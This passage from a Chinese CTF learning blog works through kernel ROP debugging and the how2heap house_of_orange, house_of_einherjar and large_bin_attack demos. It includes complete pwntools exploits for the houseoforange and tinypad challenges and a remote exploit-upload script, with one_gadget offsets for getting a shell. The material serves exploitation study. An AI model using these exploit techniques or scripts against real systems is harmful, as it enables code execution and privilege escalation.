/* FILE* kallsyms_fd = fopen("./test_kallsyms", "r"); */

if(kallsyms_fd < 0)
{
puts("[*]open kallsyms error!");
exit(0);
}

char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
{
if(commit_creds & prepare_kernel_cred)
return 0;

if(strstr(buf, "commit_creds") && !commit_creds)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
vmlinux_base = commit_creds - 0x9c8e0;
printf("vmlinux_base addr: %p\n", vmlinux_base);
}

if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
{
/* puts(buf); */
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
vmlinux_base = prepare_kernel_cred - 0x9cce0;
/* printf("vmlinux_base addr: %p\n", vmlinux_base); */
}
}

if(!(prepare_kernel_cred & commit_creds))
{
puts("[*]Error!");
exit(0);
}

}

调试过程

现在有了exp还有思路当然要自己调试的看一看了,具体调试我使用的是pwndgb

先把编译好的exp打包进root.cpio中(解包打包操作前面有了)(编译命令是师傅教我的musl-gcc -static -O2 exp.c -o exp)

然后用./rootstart把qemu起起来,执行 gdb vmlinux

接着set architecture i386:x86-64target remote:1234

这里我调试的时候第一次断在了0xffffffffc00000cc,地址是通过root模式下lsmod显示的驱动base加上IDA中偏移后得来的,所以感觉nokaslr下调试会方便一些(有kaslr时感觉断点都不太好下),断的地方就是在core_read中copy_to_user处

1585008529686

断下来了之后是这样的

栈上的情况大致如下:

1585008988570

这里分别是canary、ebp(这个ebp似乎直接返回到用户栈去了)、返回地址(对应我们驱动中ioctl的地址)

copy_to_user之后就可以获得8*8个栈上的数据,当然就包括canary还有一些地址了

1585009204137

然后从内核态返回用户态似乎是从__do_softirq+328这里返回的

1585009743004

最后断在qmemcpy之后(中间的感觉不用断了…挺好理解的),可以看到栈上的数据已经被改成了各种gadget还有返回时需要的寄存器值

调试的时候log_buf_vmcoreinfo_setup+209好像就是执行prepare_kernel_cred(0)

msg_print_ext_body+227就是执行commit_creds(rdi)

1585010675845

最后执行到最后ret之前就是这样了,返回用户态执行/bin/sh(那个0x400430就是我们的getpwn),就是从ring0直接调用,所以弹给我们的就是root的shell了

至于这个程序的kaslr没有特意去绕是因为我们直接读取了/tmp/kallsyms,从而减去没有kaslr时的内核函数基地址就可以得到加载偏移,不过内核函数加载地址和我们驱动加载地址似乎是被kaslr映射在不同的地方的,需要的情况下得分别leak才行(比如我们上面read时leak了很多内容)

我们这个程序也刚好没有使用到驱动的gadget,所以只用leak内核函数基址就好了

./start脚本去实测的效果就是这样:

1585011340948

ps:这个kaslr似乎后很多位的off都是相同的

这里再给出一个CTF比赛时打远程的脚本(来自林国鹏师傅):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 saltedfish <[email protected]>
#
# Distributed under terms of the MIT license.
from pwn import *
import sys
import os

context.log_level = 'debug'
cmd = '$ '

p=remote('192.168.3.255',1234)
def exploit(r):
r.sendlineafter(cmd, 'stty -echo')
os.system('musl-gcc -static -O2 exp.c -o exp')
os.system('gzip -c exp > exp.gz')
r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64') #heredoc
r.sendline((read('exp.gz')).encode('base64'))
r.sendline('EOF')
r.sendlineafter(cmd, 'base64 -d exp.gz.b64 > exp.gz')
r.sendlineafter(cmd, 'gunzip exp.gz')
r.sendlineafter(cmd, 'chmod +x ./exp')
r.sendlineafter(cmd, './exp')
r.interactive()

exploit(r)

how2heap - house_of_orange&houseoforange

ubuntu16.04 libc2.23

house_of_orange.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int winner ( char *ptr);

int main()
{
char *p1, *p2;
size_t io_list_all, *top;



p1 = malloc(0x400-0x10);//malloc一个small chunk (size:0x400)


top = (size_t *) ( (char *) p1 - 16 + 0x400);//top=&top_chunk
top[1] = 0xc01;//top_chunk.size=0xc01 这里,topchunk+size后的地址必须是页对齐的,prev_inuse必须要设置


p2 = malloc(0x1000);//malloc一个比top_chunk.size大的chunk,此时0xc01的旧top_chunk就会被放到 unsortedbin中去

io_list_all = top[2] + 0x9a8;//top的fd+0x9a8就等于io_list_all在libc中的地址

top[3] = io_list_all - 0x10;//把top的bk设置成io_list_all-0x10处,用于bck->fd = unsorted_chunks (av)这一任意写,此时写上去的正好是main_arena.top的地址(&main_arena.top)

memcpy( ( char *) top, "/bin/sh\x00", 8);// 将/bin/sh写到top_chunk上面


top[1] = 0x61;//在后面malloc(10)的时候,把chunk放到对应的chain处



_IO_FILE *fp = (_IO_FILE *) top;
/////////////////////////////////////////////////////////////这里就是FSOP那一套
fp->_mode = 0; // top+0xc0


fp->_IO_write_base = (char *) 2; // top+0x20
fp->_IO_write_ptr = (char *) 3; // top+0x28


size_t *jump_table = &top[12]; // controlled memory
jump_table[3] = (size_t) &winner;
*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8
///////////////////////////////////////////////////////////////////////////////
malloc(10);//malloc(0x10),size不相等时触发任意写,并在任意写之后,由于unsortedbin->bk指向的是io_list_all-0x10,此处的对应的size为0,然后就会触发malloc_printerr
//触发malloc_printerr就会触发_IO_flush_all_lockp,之后通过chain,FSOP成功(这里能通过chain劫持成功的原因也是因为main_arena上对应偏移处的_mode值不为0)
//之后就会去执行我们的winner了,而且关键是IO_FILE对于函数的调用是类似于f(ptr)这样调用的,所以最后执行的时候就是_IO_OVERFLOW(fp, EOF)=>system(&top)
//然而此时top上的字符串是/bin/sh,所以就会getshell

return 0;
}

int winner(char *ptr)
{
system(ptr);
return 0;
}

由于源how2heap上的代码注释太多,要是对具体有疑问的推荐去看一下源代码上的注释,我这个主要是总结用,还有以后参考用

整个过程是一个很巧妙的过程,没有通过free,就是通过top_chunk和unsortedbin attack实现了这个利用,全程也不是特别难理解,我的调试过程就是看了一下到底是哪出错调用的malloc_printerr

houseoforange

程序分析

build

1584105896359

最多只能build 4次,对应的chunk联系如下图所示

1584105957540

其中Orange和price_color_chunk都是固定大小的,而且price_color_chunk是calloc出来的chunk

name是我们自己控制大小的一个chunk,最大可为0x1000

see

1584106502771

基本就是打印我们的name还有price,加上一个我们指定颜色的橘子

upgrade

1584106661589

最多只允许upgrade两次,其中更新时的lenth是我们自己输出的,存在一个溢出,然后就是更新price和color

漏洞分析&Exploit

漏洞点应该说很容易理解,就是upgrade中的overflow,主要就在于我们应该怎么利用。首先程序没有free,所以很多利用都没办法下手了,但是前面刚好学到了house_of_orange,是一个不需要用free即可实现的漏洞,再来看

build中的chunk申请顺序是:malloc(0x10);malloc(len);calloc(8)

然后我们的溢出产生在第二个chunk上,可以溢出到calloc出来的chunk还有topchunk

所以这里先build一个house来修改topchunk的size,和前面house_of_orange.c中一样,设置时保持top+size+0x20页对齐,用于后续利用

设置好之后build第二个house,此时指定name为0x1000大小,即可把原来的topchunk放到unsortedbin

这个时候再进行第三次build,指定name稍微小一点,保证这次build出来的house都是从top中切出来的,然后就可以进行溢出修改、leak的操作了

最后一次build触发FSOP即可……..?是不是还少了点什么,因为我们FSOP的时候需要吧vtable指向一个我们可以控制的地方,但是我还没有leak heap或者PIE啊….这怎么办,后来再查阅wp的时候知道了通过切割largechunk时残留的fd_nextsize和bk_nextsize leak的操作….说实话因为largebin在写题的时候用到的少所以没有想到XD…记下来免得以后不记得

PS:顺带记一下fd_nextsizebk_nextsize会被清空的情况

  1. 从unsortedbin中唯一last remainder中切出来的时候(malloc.c:3494)
  2. 从largebin中切割出的remainder放入unsortedbin时,如果remainder的size仍是属于largebin的,就将这两个ptr清空
    (malloc.c:3645)(我们最后堆地址泄露就是通过从这切出来的large victim chunk)
  3. 一个属于largesize的chunk,free被链入unsortedbin时

完整EXP

有了上面思路之后写WP就很好说了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './houseoforange' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\x00'))
my_u32 = lambda x: u32(x.ljust(4, '\x00'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
def build(length,name,price,color):
p.recvuntil('Your choice : ')
p.send('1')
p.recvuntil('of name :')
p.send(str(length))
p.recvuntil('Name :')
p.send(name)
p.recvuntil('Price of Orange:')
p.send(str(price))
p.recvuntil('Color of Orange:')
p.send(str(color))

def upgrade(length,name,price,color):
p.recvuntil('Your choice : ')
p.send('3')
p.recvuntil('of name :')
p.send(str(length))
p.recvuntil('Name:')
p.send(name)
p.recvuntil('Price of Orange:')
p.send(str(price))
p.recvuntil('Color of Orange:')
p.send(str(color))

def see():
p.recvuntil('Your choice : ')
p.send('2')

build(0x10,'a'*0x10,1,0xDDAA)#0x20 0x20 0x20 0x20fa1
payload='a'*0x18+p64(0x21)+p64(0xddaa00000001)+p64(0)*2+p64(0xfa1)
upgrade(0x40,payload,1,0xDDAA)
build(0x1000,'\x00'*0x1000,1,0xDDAA)
build(0x400,'*'*0x8,1,0xDDAA)#when the size is largesize, the split victim chunk will remain the fd_nextsize&bk_nextsize

see()
p.recvuntil("********")
libc_base=my_u64(p.recv(6))-0x3c5188
loginfo("libc_base:",libc_base)

upgrade(0x10,'*'*0x10,1,0xDDAA)
see()
p.recvuntil('****************')
heap_base=my_u64(p.recv(6))-0xc0
loginfo("heap_base",heap_base)

payload='\x00'*0x408+p64(0x21)+p64(0xddaa00000010)+p64(0)+'/bin/sh\x00'+p64(0x61)+p64(0)+p64(libc_base+0x3c5520-0x10)
payload+=(p64(0)+p64(1)).ljust(0xb0,'\x00')+p64(0)
payload=payload.ljust(0xc8,'\x00')+p64(heap_base+0x5c0)+p64(0)+p64(libc.symbols['system']+libc_base)

upgrade(len(payload),payload,1,0xDDAA)

p.recvuntil('Your choice : ')
p.send('1')

p.interactive()
'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''

how2heap - house_of_einherjar&tinypad

ubuntu16.04 libc2.23

house_of_einherjar.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
fprintf(stderr, "Welcome to House of Einherjar!\n");
fprintf(stderr, "Tested in Ubuntu 16.04 64bit.\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

fprintf(stderr, "\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
fprintf(stderr, "a: %p\n", a);

int real_a_size = malloc_usable_size(a);
fprintf(stderr, "Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
fprintf(stderr, "\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
fprintf(stderr, "However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
fprintf(stderr, "We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
fprintf(stderr, "(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
fprintf(stderr, "prev_size (not used): %#lx\n", fake_chunk[0]);
fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
fprintf(stderr, "bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);

fprintf(stderr, "\nWe allocate 0xf8 bytes for 'b'.\n");
fprintf(stderr, "b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

fprintf(stderr, "\nb.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "b.size is: (0x100) | prev_inuse = 0x101\n");
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
fprintf(stderr, "If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
fprintf(stderr, "\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
fprintf(stderr, "\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
fprintf(stderr, "Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
fprintf(stderr, "Next malloc(0x200) is at %p\n", d);
}

通篇下来最重要的两点在size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);fake_chunk[1] = fake_size;

代码通过模拟漏洞修改了b的prev_inuse位为0,此时再free(b)的话就会触发向后合并,而向后合并时合并的chunk是由prev_size得到的,当我们把prev_size改成了b's chunk header-fake_chunk's heder,就会在fake chunk处触发unlink从而导致fake_chunk被合并,而且此时由于紧邻top_chunk,top_chunk就直接被改到我们栈上fake_chunk处去了,再malloc的时候就可以把我们那块fake_chunk malloc出来

某种意义上来说这个好像也和house of force一样?是通过利用topchunk从而malloc出我们想要的地址来,(代码中写到的If it had been modified, we would need a fake chunk inside b where it will try to consolidate the next chunk,就是说如果我们在溢出的时候把size大小更改了,比如从0x101改成0x100,再去进行操作的时候由于此时得到的nextchunk在被更改chunk的内部,所以我们需要能够写到这个地方修改出一个假的chunk头才能不报错)

不过我有一点没弄明白:fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size,因为在这里设置了新top chunk之后好像没必要改这个prev_size?就算把这步操作改成0也还是一样达到了效果,所以这里好像有一个疑点(后来发现只是我单纯的把这个理解成设置top_chunk了,但其实这个利用说白了就是修改prev_size还有chunk的inues位,用来oevrlap chunk也是一样的用法)

….感觉慢慢熟悉起堆来之后就不想写debug了23333,因为稍微进GDB看一下就能弄清楚了,所以也是直接撸题吧

tinypad

程序有很多小函数,这里就不做分析了,直接分析主要的逻辑或有漏洞的逻辑

程序分析

read_until

1583305845380

其中当i=len的时候,a1[i]=0的操作下标越界,可能会产生off_by_null

Add

1583304338827

首先从四个memo中获取一个size段为空的下标,然后malloc(size),size为10x100之间,对应的chunk也就是在0x200x110之间,然后根据存在bss的指针读入size的数据

delete

1583304560937

这里如果读入的下标是1对应数组下标0,判断对应处size是否为零,然后free掉ptr之后把size置零,没有把ptr置零

edit

1583304758155

edit稍微有点意思,因为我们的mome每次做操作都是从+16的位置开始的,开始的时候我没看懂这个是什么意思,后来在edit这里发现这个前面32*_QWORD的空间是用来当缓冲区的,edit之前先把下标对应的chunk中的内容用strcpy拷到memo缓冲区中去,然后用strlen获取缓冲区的长度,并将这段长度的内容输出,接着再通过strlen获取对应chunk中字符串的长度,然后read到缓冲区中去

Exploit&漏洞分析

漏洞应该比较明显了

  1. read_until的off_by_null
  2. 由于每次程序的显示是通过ptr是否为空来判断是否需要输出的,但是由于清除的是size,所以每次都会输出…直接leak各种base
  3. 结合上面的使用house_of_einherjar即可,不过我才知道这个用法原来是只要修改了prev_size然后用就好23333,本来以为是专门用来设置top_chunk的,不过也确实说明了prev_size确实可以改的很大,这是我之前在写题的时候没有想到的

有了漏洞思路之后我的做法大致就是,先malloc四个memo,然后泄露出libc和heap之后再把这几个全部free掉,用于重新构造利用的chunk结构

再次构造的时候大概就是这样:

0x101 0x71 0x101
填上自身指针用于unlink 用于fastbin attck、填上prev_size,还有off_by_null 修改这个chunk的prev_inuse位

free的时候就会直接把这三个全部都放到top_chunk里面去了,还有一个overlap的0x70 fastchunk

后续就是常规的fastbin attack了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './tinypad' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
def add(size,content):
p.recvuntil('(CMD)>>> ')
p.sendline('A')
p.recvuntil('(SIZE)>>> ')
p.sendline(str(size))
p.recvuntil('(CONTENT)>>> ')
p.sendline(content)
def free(idx):
p.recvuntil('(CMD)>>> ')
p.sendline('D')
p.recvuntil('(INDEX)>>> ')
p.sendline(str(idx+1))
def edit(idx,content):
p.recvuntil('(CMD)>>> ')
p.sendline('E')
p.recvuntil('(INDEX)>>> ')
p.sendline(str(idx+1))
p.recvuntil('(CONTENT)>>> ')
p.sendline(content)
p.recvuntil('(Y/n)>>> ')
p.sendline('Y')

add(0xf0,'a'*0xf0)#0 0x100 chunk
add(0x100,'b'*0x100)#1 0x110 chunk
add(0xf0,'c'*0xf0)#2 0x100 chunk
add(0x100,'d'*0x100)#3 0x110 chunk
free(2)
free(0)
p.recvuntil('CONTENT: ')
heap_base=my_u64(p.recv(4))-0x210
loginfo('heapbase',heap_base)
p.recvuntil(' # INDEX: 3')
p.recvuntil('CONTENT: ')
libc_base=my_u64(p.recv(6))-0x3c4b78
loginfo('libcbase',libc_base)
free(3)
free(1)#clear

#construct again
add(0xf0,p64(heap_base)*2+'\x00'*0xe0)#0 0x100
add(0x68,'\x00'*0x68)#1 0x70
add(0xf0,'\x00'*0xf0)#2 0x100

free(1)
add(0x68,'\x00'*0x60+p64(0x170))#set prev_size + off_by_null
free(2)#Merge all

free(1)#set to fastbin first
#(0,,,)
add(0xe0,'\x00'*0xe0)
#(0,1)
add(0xf0,(p64(0)+p64(0x71)+p64(libc_base+0x3c4aed)).ljust(0x70,'\x00')+p64(0)+p64(0x101)+'\x00'*(0xf0-0x80))#fill fakesize0x101 for check by free
#(0,1,2)
add(0x60,'\x00'*0x60)
#(0,1,2,3)
free(0)
#(,1,2,3)
add(0x68,'\x00'*0x13+p64(libc_base+0xf02a4))
#(0,1,2,3)
#gdb.attach(p,'b *0x400c12')
free(3)
p.recvuntil('(CMD)>>> ')
p.sendline('A')
p.recvuntil('(SIZE)>>> ')
p.sendline('1')


p.interactive()
'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''

how2heap - large_bin_attack&heapstorm2

ubuntu16.04 libc2.23

large_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
/*
This technique is taken from
https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/
[...]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
[...]
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
For more details on how large-bins are handled and sorted by ptmalloc,
please check the Background section in the aforementioned link.
[...]
*/

#include<stdio.h>
#include<stdlib.h>

int main()
{
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see glibc_build.sh for build instructions.\n");
fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");

unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;

fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

unsigned long *p1 = malloc(0x320);
fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
" the first large chunk during the free()\n\n");
malloc(0x20);

unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
" the second large chunk during the free()\n\n");
malloc(0x20);

unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
" the third large chunk during the free()\n\n");
malloc(0x20);

free(p1);
free(p2);
fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
" [ %p <--> %p ]\n\n", (void *)(p2 - 2), (void *)(p2[0]));

malloc(0x90);
fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
" freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"
", and reinsert the remaining of the freed first large chunk into the unsorted bin:"
" [ %p ]\n\n", (void *)((char *)p1 + 0x90));

free(p3);
fprintf(stderr, "Now, we free the third large chunk and it will be inserted in the unsorted bin:"
" [ %p <--> %p ]\n\n", (void *)(p3 - 2), (void *)(p3[0]));

//------------VULNERABILITY-----------

fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
" as well as its \"bk\" and \"bk_nextsize\" pointers\n");
fprintf(stderr, "Basically, we decrease the size of the freed second large chunk to force malloc to insert the freed third large chunk"
" at the head of the large bin freelist. To overwrite the stack variables, we set \"bk\" to 16 bytes before stack_var1 and"
" \"bk_nextsize\" to 32 bytes before stack_var2\n\n");

p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);

//------------------------------------

malloc(0x90);

fprintf(stderr, "Let's malloc again, so the freed third large chunk being inserted into the large bin freelist."
" During this time, targets should have already been rewritten:\n");

fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);

return 0;
}

感觉这种画个图的话就很明了,我这里画了一个free(p3)之后的图,unsortedbin上有两个chunk,largebin上有一个chunk

这时largebin中的chunk fd_nextsize和bk_nextsize都指向自己,再来看看等下把chunk从unsortedbin中卸下来之后插入largebin的时候是什么样的

largebin在原代码中的插入(largebin对应bin链有chunk的情况)是这样的:

1582823683795

当我们改了原largebin链中的chunk之后,就变成了这样

此时再插入0x410的chunk(对应victim),就会执行最下面那个else分支中的代码,

1
2
3
4
5
6
7
8
else{
victim->fd_nextsize = fwd;//此时的fwd指向0x3f0的chunk
victim->bk_nextsize = fwd->bk_nextsize;//栈指针给到victim的bk_nextsize
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;//此时var2对应的偏移刚好是->bk_nextsize->fd_nextsize
//所以var2会被赋值为victim
}
bck = fwd->bk;//此时bck被设置成了栈指针

接着看,因为后面还会执行一段代码

1
2
3
4
5
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;//Here!栈指针指向位置的对应偏移处(var1)就也被赋值成了victim

原理就是这么个原理,任意地址写了两个vicitm的地址上去

下面直接撸题实操吧

heapstorm2

这个题说实话写的时候overlap之后都不知道该怎么用…所以后来就直接参考了wp(跪…真的是前路漫漫啊)

程序分析

首先根据程序的mmap创建一个新的segment,这样在IDA中看起来会好一些

init

程序用mallopt关掉了所有的fastbin,然后用mmap分配了一块固定地址的内存,并在random_area(0x13370800)为起始的位置存放了0x18个字节的随机数据,其中0偏移处的数据用来异或存放堆指针,+1偏移处的数据用来异或存放申请的size
然后+2和+3偏移处,也就是random_area[1]处的两个数据,是被设置成相等的

设置mask的意思也就是说我们在程序中申请的chunk指针还有对应的size都会被异或两个固定值然后放在这块内存区域

alloc

最多只能有16个chunk,按照顺序排放,其中mask_xor函数就是用来xor对应数据的了,mask1用来xor指针,mask2用来异或size,因为random_area的前四个qword都有意义所以我们看到的数组下标都是+2的(这里可以设置一下结构体再优化一下),calloc(size)之后没有赋值操作,所以只是分配

update

update函数中会往chunk里读入数据(长度不能大于size-0xc),在最后再加上0xc长度的数据HEAPSTORM_II,但是补0的时候发生了溢出,构成off_by_null,这也是程序的漏洞点所在

delete

1582822986854

delete函数就是输入下标然后free,并”清空”记录的数据

view

1582823036813

view函数比较苛刻,需要当我们random_area[1]处的两个值异或为0x13377331的时候才能writen,所以一开始leak不了,这也是我当时卡在这个题一直出不来的主要原因

漏洞分析&exploit

